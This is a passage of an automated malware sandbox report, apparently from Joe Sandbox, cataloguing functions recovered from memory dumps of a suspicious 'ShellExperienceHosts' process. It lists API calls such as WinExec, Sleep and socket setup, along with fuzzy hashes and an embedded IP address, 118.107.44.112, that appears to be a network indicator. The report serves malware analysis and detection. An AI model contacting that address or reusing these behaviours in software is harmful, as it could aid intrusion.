                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 0332F721
                                                                              • Part of subcall function 0332F673: __FF_MSGBANNER.LIBCMT ref: 0332F68C
                                                                              • Part of subcall function 0332F673: __NMSG_WRITE.LIBCMT ref: 0332F693
                                                                              • Part of subcall function 0332F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03334500,00000000,00000001,00000000,?,03338DE6,00000018,03346448,0000000C,03338E76), ref: 0332F6B8
                                                                            • std::exception::exception.LIBCMT ref: 0332F756
                                                                            • std::exception::exception.LIBCMT ref: 0332F770
                                                                            • __CxxThrowException@8.LIBCMT ref: 0332F781
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                            • String ID: bad allocation
                                                                            • API String ID: 615853336-2104205924
                                                                            • Opcode ID: d5cb300ecb92f75b9039ae2532fbf16bd5fd5c616d89dee8a8b8621a5a8da8e4
                                                                            • Instruction ID: b19cc6414b0d436386bdd7b60fd37c51d3c7f7dc4e4d188db5869755311db5c5
                                                                            • Opcode Fuzzy Hash: d5cb300ecb92f75b9039ae2532fbf16bd5fd5c616d89dee8a8b8621a5a8da8e4
                                                                            • Instruction Fuzzy Hash: D1F0F478D007296ECB00FB58DCE1A9F7FB8EB42644F180159F414EA191DFB0EA008B80
                                                                            Function 6C86CEA2 Relevance: 7.8, APIs: 5, Instructions: 292COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 655357848afafb581d5b29f9a0bf869acc7293993279c4a47d2306c6889564e5
                                                                            • Instruction ID: 7688814a8805d53468d07a257064164e74ab8c02b4a1a89a17c9876b5aecaca5
                                                                            • Opcode Fuzzy Hash: 655357848afafb581d5b29f9a0bf869acc7293993279c4a47d2306c6889564e5
                                                                            • Instruction Fuzzy Hash: 68B1F870A04249EFDB21CF9ED940BADBBB1BF4A318F24856AE41097B41C7B1D941CB60
                                                                            Function 10002D10 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 10002D3C
                                                                            • CancelIo.KERNEL32(?), ref: 10002D46
                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 10002D4F
                                                                            • closesocket.WS2_32(?), ref: 10002D59
                                                                            • SetEvent.KERNEL32(00000001), ref: 10002D63
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                            • String ID:
                                                                            • API String ID: 1486965892-0
                                                                            • Opcode ID: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                                                            • Instruction ID: c3dd280d0a222891198d8956340d5cd90ea8efbda93af296f9b36197db09124c
                                                                            • Opcode Fuzzy Hash: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                                                            • Instruction Fuzzy Hash: 95F04F75100710EFE320DF94CC89F5677B8FB49B12F148659F6829B690C7B1F9048BA0
                                                                            Function 6C6BE4D8 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 448COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock
                                                                            • String ID: tJe$uJe
                                                                            • API String ID: 2638373210-462319029
                                                                            • Opcode ID: c4af98d67da0a3c8fd554ba3fb9f8cdcfea8f2bc5c8ebc8302512543f3d9c1ec
                                                                            • Instruction ID: 41d0d365e4fa65a5b23156ab4815a5cf6b27d61896e1de866520470defd5f718
                                                                            • Opcode Fuzzy Hash: c4af98d67da0a3c8fd554ba3fb9f8cdcfea8f2bc5c8ebc8302512543f3d9c1ec
                                                                            • Instruction Fuzzy Hash: 13120375609740DFC765CF18C280A5ABBE1AB89308F104DAEF899DB761E731EC54CB86
                                                                            Function 6C76DD01 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(Shell32,?,?,6C6DC052,MFCApplication4.AppID.NoVersion), ref: 6C76DD0C
                                                                            • GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID), ref: 6C76DD1D
                                                                            Strings
                                                                            • Shell32, xrefs: 6C76DD05
                                                                            • SetCurrentProcessExplicitAppUserModelID, xrefs: 6C76DD17
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: SetCurrentProcessExplicitAppUserModelID$Shell32
                                                                            • API String ID: 1646373207-2658420654
                                                                            • Opcode ID: 6dbecd5333bf814639877ad07e892dbbf0897ab691bee479a7b10e528d3117bb
                                                                            • Instruction ID: 32b464e2631d01a066f38231555aa69402c3504e82c58137f98a61bcc8091958
                                                                            • Opcode Fuzzy Hash: 6dbecd5333bf814639877ad07e892dbbf0897ab691bee479a7b10e528d3117bb
                                                                            • Instruction Fuzzy Hash: 55E0DF32701711278A256B22D91CC1B3B28DB927A5311083AF905C2B00CF74EC00C6E8
                                                                            Function 6C6D029E Relevance: 6.5, APIs: 4, Instructions: 459sleepprocessCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WinExec.KERNEL32(?,00000000), ref: 6C6D042C
                                                                            • Sleep.KERNEL32(00007530), ref: 6C6D0437
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ExecSleep
                                                                            • String ID:
                                                                            • API String ID: 1384635584-0
                                                                            • Opcode ID: f83e87d17ca9021aeb58e603c6fedcfe3c09d9c216189f47be7e1c9295983ed5
                                                                            • Instruction ID: 8af0f8cca66bf3045b537cb5de317a523770f026b13d140b3200e8641eeda6ee
                                                                            • Opcode Fuzzy Hash: f83e87d17ca9021aeb58e603c6fedcfe3c09d9c216189f47be7e1c9295983ed5
                                                                            • Instruction Fuzzy Hash: 62F1BB33E150A44BDB2CCB28CC947ED7A63AF85318F1A47A9D41AE7781DB31ADC48785
                                                                            Function 6C6DA446 Relevance: 6.2, APIs: 4, Instructions: 203sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen$Sleep
                                                                            • String ID:
                                                                            • API String ID: 2737124692-0
                                                                            • Opcode ID: 590ebc41968ab6d2d078e7150094bde84ddb16cac153010f0b373df2e6168d34
                                                                            • Instruction ID: 4c1226b6d44b2ecaa26cab0cebaac9ed663363225d7e58d93f2af4bbce0cb67b
                                                                            • Opcode Fuzzy Hash: 590ebc41968ab6d2d078e7150094bde84ddb16cac153010f0b373df2e6168d34
                                                                            • Instruction Fuzzy Hash: CF7176B2C052189BCB10CF74DC447DEBBB6AF09318F164735E808A7B81E735AA488799
                                                                            Function 6C7412D8 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000001,6C8F39F0,?), ref: 6C741335
                                                                            • VerSetConditionMask.KERNEL32(00000000), ref: 6C74133D
                                                                            • VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6C74134E
                                                                            • GetSystemMetrics.USER32(00001000), ref: 6C74135F
                                                                              • Part of subcall function 6C741395: __EH_prolog3.LIBCMT ref: 6C74139C
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000016), ref: 6C7413A5
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000000F), ref: 6C7413B8
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000015), ref: 6C7413CF
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000000F), ref: 6C7413DB
                                                                              • Part of subcall function 6C741395: GetDeviceCaps.GDI32(?,0000000C), ref: 6C741403
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000000F), ref: 6C741411
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000010), ref: 6C74141F
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000015), ref: 6C74142D
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000016), ref: 6C74143B
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000014), ref: 6C741449
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000012), ref: 6C741457
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000011), ref: 6C741465
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000006), ref: 6C741470
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000000D), ref: 6C74147B
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000000E), ref: 6C741486
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000005), ref: 6C741491
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000008), ref: 6C74149F
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000009), ref: 6C7414AA
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000007), ref: 6C7414B5
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000002), ref: 6C7414C0
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000003), ref: 6C7414CB
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000001B), ref: 6C7414D9
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000001C), ref: 6C7414E7
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000000A), ref: 6C7414F5
                                                                              • Part of subcall function 6C7417B3: __EH_prolog3_GS.LIBCMT ref: 6C7417BD
                                                                              • Part of subcall function 6C7417B3: GetDeviceCaps.GDI32(?,00000058), ref: 6C7417DD
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C741839
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C741857
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C741875
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C741893
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C7418B1
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C7418CF
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C7418ED
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C74190B
                                                                              • Part of subcall function 6C741CD2: GetSystemMetrics.USER32(00000031), ref: 6C741CE0
                                                                              • Part of subcall function 6C741CD2: GetSystemMetrics.USER32(00000032), ref: 6C741CEE
                                                                              • Part of subcall function 6C741CD2: SetRectEmpty.USER32(?), ref: 6C741D01
                                                                              • Part of subcall function 6C741CD2: EnumDisplayMonitors.USER32(00000000,00000000,6C7424AA,?,?,?), ref: 6C741D11
                                                                              • Part of subcall function 6C741CD2: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6C741D20
                                                                              • Part of subcall function 6C741CD2: SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 6C741D4D
                                                                              • Part of subcall function 6C741CD2: SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 6C741D61
                                                                              • Part of subcall function 6C741CD2: SystemParametersInfoW.USER32(0000100A,00000000,?,00000000), ref: 6C741D87
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Color$DeleteObject$System$Info$Parameters$Metrics$CapsConditionDeviceMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 2442922003-0
                                                                            • Opcode ID: 8fa58d2472f771d3c4ece49c083de971bc97aa0da113882dac5b48d2567173fd
                                                                            • Instruction ID: ab27736b355db7e6a912308db74458c68776df81c43321b7579f5786ce590e04
                                                                            • Opcode Fuzzy Hash: 8fa58d2472f771d3c4ece49c083de971bc97aa0da113882dac5b48d2567173fd
                                                                            • Instruction Fuzzy Hash: 1B11A7B0A00318ABDB21AF718D4DFEE77BDEB89708F00456DA14596281CBB45E44CFE0
                                                                            Function 10006F17 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 10006F31
                                                                              • Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
                                                                              • Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
                                                                              • Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8
                                                                            • std::exception::exception.LIBCMT ref: 10006F66
                                                                            • std::exception::exception.LIBCMT ref: 10006F80
                                                                            • __CxxThrowException@8.LIBCMT ref: 10006F91
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                            • String ID:
                                                                            • API String ID: 615853336-0
                                                                            • Opcode ID: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
                                                                            • Instruction ID: bc3bc25b656f4220cb3330c80879dd0d2e796a6a37b49e0188f73f67aa49fa4f
                                                                            • Opcode Fuzzy Hash: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
                                                                            • Instruction Fuzzy Hash: C5F02D3980425BAAFB00DBA4DC91AAD3AE7EB496C0F300025F4149E0D5DFB1EBC0C740
                                                                            Function 6C6CDA8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000), ref: 6C6CDAAD
                                                                            • _strlen.LIBCMT ref: 6C6CDAF8
                                                                              • Part of subcall function 6C6BC08C: _strlen.LIBCMT ref: 6C6BC11C
                                                                            Strings
                                                                            • Error retrieving folder path, xrefs: 6C6CDAB7
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen$FolderPath
                                                                            • String ID: Error retrieving folder path
                                                                            • API String ID: 1827750136-3197305068
                                                                            • Opcode ID: 2a06bea3fe94524109c7e21964b7819641e99e4243e2f1f370117d2c9a8bc877
                                                                            • Instruction ID: 6ab1fd9807019f3ef5bc697d91e0f57f2fc31230072c067036b02748c2983b0b
                                                                            • Opcode Fuzzy Hash: 2a06bea3fe94524109c7e21964b7819641e99e4243e2f1f370117d2c9a8bc877
                                                                            • Instruction Fuzzy Hash: 2021C4F2A403446BD3309F25AC44AABB6FCDFA2708F100E29E48583B01E771955887A6
                                                                            Function 6C6D86C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSAStartup.WS2_32(00000202,?), ref: 6C6D86E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Startup
                                                                            • String ID: $118.107.44.112
                                                                            • API String ID: 724789610-245858108
                                                                            • Opcode ID: 2079653e0b7db0de2f38d1db8d31f422b1f61d99debe4a336518e5e52208b68c
                                                                            • Instruction ID: f375abfda3ff14123f20ab1d6f9f66a0bc58dba237184d48e095c34f27e91feb
                                                                            • Opcode Fuzzy Hash: 2079653e0b7db0de2f38d1db8d31f422b1f61d99debe4a336518e5e52208b68c
                                                                            • Instruction Fuzzy Hash: DEE030704183419AE2009F11C908BABB6E8AFDA30CF015B0DB4D455151D3B4A6888B96
                                                                            Function 03323160 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0332316B
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 03323183
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0332322F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentThread$ExchangeInterlocked
                                                                            • String ID:
                                                                            • API String ID: 4033114805-0
                                                                            • Opcode ID: 1dadcbc643ca78f458980a523463b33f5a08dd1565989f942dbe84ce5a8edcc6
                                                                            • Instruction ID: 91eb7a04fbc9ae28aead419ef79ce67375ac420469e38bd49d8a53261ea12484
                                                                            • Opcode Fuzzy Hash: 1dadcbc643ca78f458980a523463b33f5a08dd1565989f942dbe84ce5a8edcc6
                                                                            • Instruction Fuzzy Hash: A431AB782007129FC718EF29C9C0A66BBE8FF44724B10C52CE85ACB615D735F842CB80
                                                                            Function 100011B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __floor_pentium4.LIBCMT ref: 100011E9
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 10001226
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001255
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
